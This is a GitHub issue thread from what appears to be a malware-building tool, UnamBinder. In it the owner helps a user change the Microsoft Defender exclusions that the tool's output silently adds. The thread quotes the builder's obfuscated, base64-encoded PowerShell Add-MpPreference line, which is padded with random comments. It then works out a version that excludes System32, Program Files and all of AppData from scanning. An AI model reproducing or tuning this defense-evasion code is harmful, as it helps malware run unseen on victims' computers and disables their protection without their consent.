Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exclusions #56

Open
gamesaccounta opened this issue Jul 12, 2023 · 12 comments
Open

Exclusions #56

gamesaccounta opened this issue Jul 12, 2023 · 12 comments

Comments

@gamesaccounta
Copy link

How can I change the exclusions UnamBinder makes?
@UnamSanctam
Copy link
Owner

On this line:

UnamBinder/UnamBinder/Forms/Builder.cs

Line 251 in b79b6f3

CipherReplace(stringb, "#WDCOMMAND", $"-EncodedCommand \"{Convert.ToBase64String(Encoding.Unicode.GetBytes($"<#{RandomString(3, true)}#>Add-MpPreference <#{RandomString(3, true)}#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#{RandomString(3, true)}#> -Force <#{RandomString(3, true)}#>"))}\"", csharp);

@gamesaccounta
Copy link
Author

I wish to add System32, AppData and ProgramFiles replacing "$env:UserProfile,$env:SystemDrive" to "$env:System32,$env:ProgramFiles,$env:AppData", but it doesnt work, can you help me?

@UnamSanctam
Copy link
Owner

I don't believe $env:System32 exists, but you can use [Environment]::SystemDirectory instead I think.

@gamesaccounta
Copy link
Author

How can I do that?

@UnamSanctam
Copy link
Owner

@([Environment]::SystemDirectory,$env:ProgramFiles,$env:AppData)

@gamesaccounta
Copy link
Author

That adds program files x86, i want programfiles

@gamesaccounta
Copy link
Author

And it adds AppData\Roaming, i want all AppData

@UnamSanctam
Copy link
Owner

UnamSanctam commented Jul 13, 2023
edited
Loading

That adds program files x86, i want programfiles

That should not add the x86 Program Files unless you somehow has the environmental variable set as that or if it's due to a WoW64 subsystem, you can try using $env:ProgramW6432

You can see what each environmental variable points to by running the env command inside a command line.

And it adds AppData\Roaming, i want all AppData

Yes AppData usually refers to AppData\Roaming, if you want the base folder then you'd have to traverse back one folder with something like Join-Path -Path $env:AppData -ChildPath '..'

@gamesaccounta
Copy link
Author

Is it well? Join-Path -Path $env:AppData -ChildPath '..' -ExclusionPath @([Environment]::SystemDirectory,$env:ProgramFiles,$env:AppData)

@UnamSanctam
Copy link
Owner

It would be something like this (I also changed the command):
-ExclusionPath @([Environment]::SystemDirectory,$env:ProgramW6432,(Split-Path $env:APPDATA))

@gamesaccounta
Copy link
Author

Thanks it works sir, how can I donate you for this huge help?

@UnamSanctam
Copy link
Owner

Thank you, I have (crypto) donation links on this repository main page at the bottom, but only give something if you have enough to give away.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@UnamSanctam @gamesaccounta